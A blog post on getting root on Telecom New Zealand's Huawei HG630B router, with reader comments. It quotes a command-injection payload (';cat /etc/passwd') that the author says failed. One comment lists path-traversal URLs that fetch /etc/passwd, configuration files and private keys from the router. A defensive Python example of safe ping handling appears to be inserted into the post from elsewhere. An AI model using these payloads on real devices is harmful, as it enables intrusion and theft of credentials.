Huawei HG630B. Got Root?


Telecom New Zealand are distributing the Huawei HG630B router as their ‘Home Gateway’ for residential customers. These routers are particularly interesting as they are Tri-Purpose. They have three WAN interfaces: an RJ11 socket for ADSL/VDSL, Ethernet for Fibre and USB for a USB cellular modem.
Telecom have been distributing these routers since at least the start of 2014, so a number of them are out in the wild.

The Telecom (Huawei) HG630B



One thing to note is that these routers are heavily branded and heavily locked down... AND they leave (at least) two external ports open on the WAN side.

The two ports open on the WAN side are 22 (SSH) and 443 (HTTPS). If you try to use port 22 or 443 as an incoming port, these ‘Admin’ ports are incremented (i.e. Admin port 22 is changed to 23). It appears impossible to disable the Admin incoming ports through the web interface.

The only way to change this behaviour is to somehow get root access to the device.

I first attempted the tried and tested ping hack on the device. The ping hack is a classic command injection hack where the device simply takes whatever address you want to ping and executes it as “ping address>/var/pingresultfile”. Changing the address to “;cat /etc/passwd” runs the command “ping ;cat /etc/passwd>/var/pingresultfile” and voila, you have access to run whatever you want at (normally) full root privileges. This failed; it seems that Huawei take note of security reports and harden their software.
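To make the defensive side of this concrete, here is an added example (not code from the post or from the HG630B firmware) contrasting the injectable pattern described above with a handler that validates the target and never hands user input to a shell. The function names, the `-c 4` count and the result-file path are my own assumptions for illustration.

```python
import ipaddress
import re
import subprocess

# RFC 1123 style hostname: alphanumeric labels, internal hyphens only, dot separated.
# A leading hyphen is impossible here, so a target can never be read as a ping option.
HOSTNAME_RE = re.compile(
    r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def vulnerable_command(target: str) -> str:
    """The pattern the post describes: user input pasted into one shell string.

    Returned rather than executed so it can be inspected safely; a ';' in
    `target` terminates the ping command and starts a second one.
    """
    return f"ping {target}>/var/pingresultfile"


def validate_target(target: str) -> bool:
    """Accept only a literal IPv4/IPv6 address or a plain DNS hostname."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        pass
    return len(target) <= 253 and HOSTNAME_RE.fullmatch(target) is not None


def build_safe_argv(target: str) -> list:
    """Build an argv list: the target is a single argument, never shell text."""
    if not validate_target(target):
        raise ValueError("rejected ping target")
    return ["ping", "-c", "4", target]


def run_ping(target: str, result_path: str = "/var/pingresultfile") -> int:
    """Run ping with shell=False and write its output to the result file."""
    argv = build_safe_argv(target)
    with open(result_path, "w") as out:
        # No shell is involved, so metacharacters in `target` have no meaning.
        completed = subprocess.run(argv, stdout=out, stderr=subprocess.STDOUT,
                                   shell=False, timeout=30)
    return completed.returncode
```

`vulnerable_command(";cat /etc/passwd")` yields the exact string the post quotes, while `build_safe_argv` raises on the same input and only ever emits a four-element argv for accepted targets.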

Maybe I need to take a look around inside..

9 comments on “Huawei HG630B. Got Root?”
  1. Paul says:

    Is there a generic firmware that can be used to flash that away? Did you get any further

    • John says:

      I’m still investigating when I have the time.
      I am able to run commands as root, but not keen to divulge the vulnerability yet.

  2. Sam says:

    Oddly, we have this HG630B as well. We can administer via its web-based administrative interface on the LAN.
    We have a static IP and wanted to access the web-based interface via http but can't for the life of me see how to enable that. So far have created a port forward from port 8080 (start) port 8080 (end) then internal port 80. Oddly, as described in your post above with incremental ports, if I went to ip.xx.xx.xx:8081 I got the login prompt which showed the username and password, but wouldn't let me in. Feels like I'm close, but have a feeling this is locked down in some respect.

  3. thefool says:

    Since you can open the firmware file as a filesystem, mount it rw, at say /routerupdate, then modify any system configuration etc., save the changes and update the router with this firmware; the restriction would be removed.

  4. Mark says:

    Hi John… any progress here? I have just ordered one of these as a replacement for our antiquated DLINK. I’d like to know a bit more about gaining a little more control over the device.

  5. Jon says:

    Hi, Can you please let me know if you found a way to gain access to the device without jtagging?
    My device is a different model (HG658) but from the dump you posted it seems similar and the ping (and ftp) exploits don’t work on it.
    I just want to get the VOIP password my ISP has set on it because they won’t provide it. I’ve managed to get the rest of the details via hidden pages such as voip/vcesipbasicaccount.asp etc.
    Thanks

  6. Jamie Lennon says:

    Instead of having to backwards engineer the firmware have a look at these, I didn’t have much luck in decrypting the currentcfg file but maybe I’m lacking in skills. This router has a bug in the directory that allows you to download configuration files directly.

    http://192.168.1.254/images/…/…//…/…//etc/passwd
    http://192.168.1.254/images/…/…//…/…//config/currentcfg
    http://192.168.1.254/images/…/…//…/…//etc/t_tree.xml
    http://192.168.1.254/images/…/…//…/…//etc/serverkey.pem
    http://192.168.1.254/images/…/…//…/…//etc/servercert.pem
    http://192.168.1.254/images/…/…//…/…//etc/defaultcfg.xml
    http://192.168.1.254/images/…/…//…/…//lib/libcfmapi.so

    Keys for currentcfg and defaultcfg are hidden here from what I can see. But I haven’t worked out how the encryption process is done; I think the web binary and the libcfmapi.so work together here.

  7. Jamie Lennon says:

    This guy knows his stuff, different router but the principle is the same http://pastebin.com/8DPdK3V6
